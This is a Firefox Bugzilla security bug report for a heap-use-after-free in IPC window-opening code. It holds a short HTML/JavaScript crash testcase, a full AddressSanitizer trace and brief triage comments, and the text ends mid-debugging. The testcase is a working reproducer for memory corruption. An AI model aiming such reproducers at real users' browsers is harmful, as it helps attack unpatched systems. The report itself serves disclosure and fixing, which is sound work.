Closed
Bug 1378112
Opened 7 years ago
Closed 7 years ago
heap-use-after-free in mozilla::layout::PRenderFrameChild::Send__delete__
Categories
(Core :: IPC, defect)
Tracking
()
RESOLVED
FIXED
| Tracking | Status | |
|---|---|---|
| firefox-esr52 | --- | unaffected |
| firefox54 | --- | unaffected |
| firefox55 | --- | unaffected |
| firefox56 | --- | fixed |
People
(Reporter: nils, Unassigned, NeedInfo)
References
Details
(5 keywords, Whiteboard: [post-critsmash-triage] fixed by bug 1378374)
Attachments
(3 files)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170703081455) when run in private mode (command line argument: -private).
<script>
function start() {
o17=window.top.open('data:text/html,<div>','popup10','height=1,innerWidth=-10,toolbar');
window.top.setTimeout(fun0, 4);
o17.close();
o17.open('data:text/html,<div>','popup73','width=114694,top=323,outerHeight=285,menubar,personalbar,dependent,resizable');
}
function fun0() {
x = new window.XMLHttpRequest.prototype.constructor();
x.open("POST","https://mozilla.org", false);
x.send("test");
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==17569==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000136dd8 at pc 0x7f9d6a0669d4 bp 0x7ffc3a5c8a10 sp 0x7ffc3a5c8a08
READ of size 4 at 0x604000136dd8 thread T0 (Web Content)
#0 0x7f9d6a0669d3 in Id /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/ProtocolUtils.h:177:33
#1 0x7f9d6a0669d3 in mozilla::layout::PRenderFrameChild::Send__delete__(mozilla::layout::PRenderFrameChild*) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PRenderFrameChild.cpp:65
#2 0x7f9d6ea81005 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:986:5
#3 0x7f9d6eaff4f0 in mozilla::dom::TabChild::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1004:16
#4 0x7f9d733eb550 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:879:24
#5 0x7f9d733f060f in OpenWindow2 /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
#6 0x7f9d733f060f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
#7 0x7f9d6b74a85a in nsGlobalWindow::OpenInternal(nsAString const&, nsAString const&, nsAString const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13036:21
#8 0x7f9d6b748f6f in OpenJS /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8924:10
#9 0x7f9d6b748f6f in nsGlobalWindow::OpenOuter(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8886
#10 0x7f9d6b7493fd in nsGlobalWindow::Open(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8895:3
#11 0x7f9d6cc1fc22 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
#12 0x7f9d6cc1e500 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15689:13
#13 0x7f9d73945724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#14 0x7f9d73945724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#15 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#16 0x7f9d7459624e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
#17 0x7f9d7455a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
#18 0x7f9d745763d3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
#19 0x7f9d74578da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
#20 0x7f9d73945b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#21 0x7f9d73945b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
#22 0x7f9d7392e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#23 0x7f9d7392e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#24 0x7f9d739152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#25 0x7f9d739458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#26 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#27 0x7f9d742bce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#28 0x7f9d6ceae555 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#29 0x7f9d6d8386fb in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#30 0x7f9d6d8386fb in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#31 0x7f9d6d8017b9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1142:51
#32 0x7f9d6d803692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
#33 0x7f9d6d7e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
#34 0x7f9d6d7e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
#35 0x7f9d6fa3e94f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7
#36 0x7f9d7298df3a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7698:21
#37 0x7f9d72989f98 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7496:7
#38 0x7f9d7299150f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7393:13
#39 0x7f9d6a918a22 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1299:3
#40 0x7f9d6a917a1c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:860:14
#41 0x7f9d6a914868 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:749:9
#42 0x7f9d6a916732 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:631:5
#43 0x7f9d6a91745c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:487:14
#44 0x7f9d69006ce3 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#45 0x7f9d6ba67a9b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8922:18
#46 0x7f9d6ba67662 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8844:9
#47 0x7f9d6ba41175 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5365:3
#48 0x7f9d6bb03662 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1138:12
#49 0x7f9d6bb03662 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1144
#50 0x7f9d6bb03662 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1187
#51 0x7f9d68e391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
#52 0x7f9d68e65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
#53 0x7f9d68e6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
#54 0x7f9d69c4a1f1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#55 0x7f9d69ba6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
#56 0x7f9d69ba6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
#57 0x7f9d69ba6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
#58 0x7f9d6f24ca6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#59 0x7f9d7347fa47 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
#60 0x7f9d69ba6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
#61 0x7f9d69ba6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
#62 0x7f9d69ba6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
#63 0x7f9d7347f4ad in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
#64 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
#65 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
#66 0x7f9d85fda82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
#67 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)
0x604000136dd8 is located 8 bytes inside of 40-byte region [0x604000136dd0,0x604000136df8)
freed by thread T0 (Web Content) here:
#0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7f9d6eb13dd5 in DeallocPRenderFrameChild /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2552:5
#2 0x7f9d6eb13dd5 in non-virtual thunk to mozilla::dom::TabChild::DeallocPRenderFrameChild(mozilla::layout::PRenderFrameChild*) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2550
#3 0x7f9d6a279f8a in mozilla::dom::PBrowserChild::DeallocSubtree() /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:5075:13
#4 0x7f9d6a277865 in mozilla::dom::PBrowserChild::Send__delete__(mozilla::dom::PBrowserChild*) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:1935:14
#5 0x7f9d6eb27278 in mozilla::dom::TabChild::DelayedDeleteRunnable::Run() /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:327:23
#6 0x7f9d68e65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
#7 0x7f9d68e6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
#8 0x7f9d6f0adc95 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3088:31)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
#9 0x7f9d6f0adc95 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3088
#10 0x7f9d6f0cb846 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:379:13
#11 0x7f9d6cce4156 in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:783:13
#12 0x7f9d6d448b1e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3028:13
#13 0x7f9d73945724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#14 0x7f9d73945724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#15 0x7f9d7392e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#16 0x7f9d7392e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#17 0x7f9d739152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#18 0x7f9d739458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#19 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#20 0x7f9d742bce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#21 0x7f9d6cfea559 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
#22 0x7f9d6b771e2c in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
#23 0x7f9d6b771e2c in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13335
#24 0x7f9d6b93b954 in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:902:42
#25 0x7f9d6b931110 in mozilla::dom::TimeoutExecutor::MaybeExecute() /home/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:167:11
#26 0x7f9d6b931966 in Notify /home/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:235:5
#27 0x7f9d6b931966 in non-virtual thunk to mozilla::dom::TimeoutExecutor::Notify(nsITimer*) /home/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:230
#28 0x7f9d68e76f92 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:523:40
#29 0x7f9d68e4120b in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
#30 0x7f9d68e53f75 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:191:22
#31 0x7f9d68e53aff in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:75:15
#32 0x7f9d68e391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
#33 0x7f9d68e65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
#34 0x7f9d68e6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
#35 0x7f9d6ea7ffe1 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:969:24)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
#36 0x7f9d6ea7ffe1 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:969
previously allocated by thread T0 (Web Content) here:
#0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f9d6eb13ce0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f9d6eb13ce0 in AllocPRenderFrameChild /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2546
#4 0x7f9d6eb13ce0 in non-virtual thunk to mozilla::dom::TabChild::AllocPRenderFrameChild() /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2544
#5 0x7f9d6a2644f5 in mozilla::dom::PBrowserChild::SendPRenderFrameConstructor() /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:193:40
#6 0x7f9d6ea7f0f4 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:855:46
#7 0x7f9d6eaff4f0 in mozilla::dom::TabChild::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsAString const&, nsACString const&, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1004:16
#8 0x7f9d733eb550 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:879:24
#9 0x7f9d733f060f in OpenWindow2 /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
#10 0x7f9d733f060f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
#11 0x7f9d6b74a85a in nsGlobalWindow::OpenInternal(nsAString const&, nsAString const&, nsAString const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13036:21
#12 0x7f9d6b748f6f in OpenJS /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8924:10
#13 0x7f9d6b748f6f in nsGlobalWindow::OpenOuter(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8886
#14 0x7f9d6b7493fd in nsGlobalWindow::Open(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8895:3
#15 0x7f9d6cc1fc22 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
#16 0x7f9d6cc1e500 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15689:13
#17 0x7f9d73945724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#18 0x7f9d73945724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#19 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#20 0x7f9d7459624e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
#21 0x7f9d7455a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
#22 0x7f9d745763d3 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
#23 0x7f9d74578da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
#24 0x7f9d73945b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#25 0x7f9d73945b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
#26 0x7f9d7392e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#27 0x7f9d7392e54b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
#28 0x7f9d739152c8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#29 0x7f9d739458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#30 0x7f9d73946212 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#31 0x7f9d742bce1b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
#32 0x7f9d6ceae555 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#33 0x7f9d6d8386fb in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#34 0x7f9d6d8386fb in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#35 0x7f9d6d8017b9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1142:51
#36 0x7f9d6d803692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
#37 0x7f9d6d7e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/ProtocolUtils.h:177:33 in Id
Shadow bytes around the buggy address:
0x0c088001ed60: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c088001ed70: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
0x0c088001ed80: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fd
0x0c088001ed90: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c088001eda0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
=>0x0c088001edb0: fa fa fd fd fd fd fd fd fa fa fd[fd]fd fd fd fa
0x0c088001edc0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
0x0c088001edd0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
0x0c088001ede0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
0x0c088001edf0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c088001ee00: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==17569==ABORTING
|
||
Updated•7 years ago
|
|
||
Comment 2•7 years ago
|
||
The first testcase doesn't crash for me (on Linux64). This one does though.
|
|
||
Comment 3•7 years ago
|
||
Looks like we're trying to delete an actor twice:
(rr) fr 3
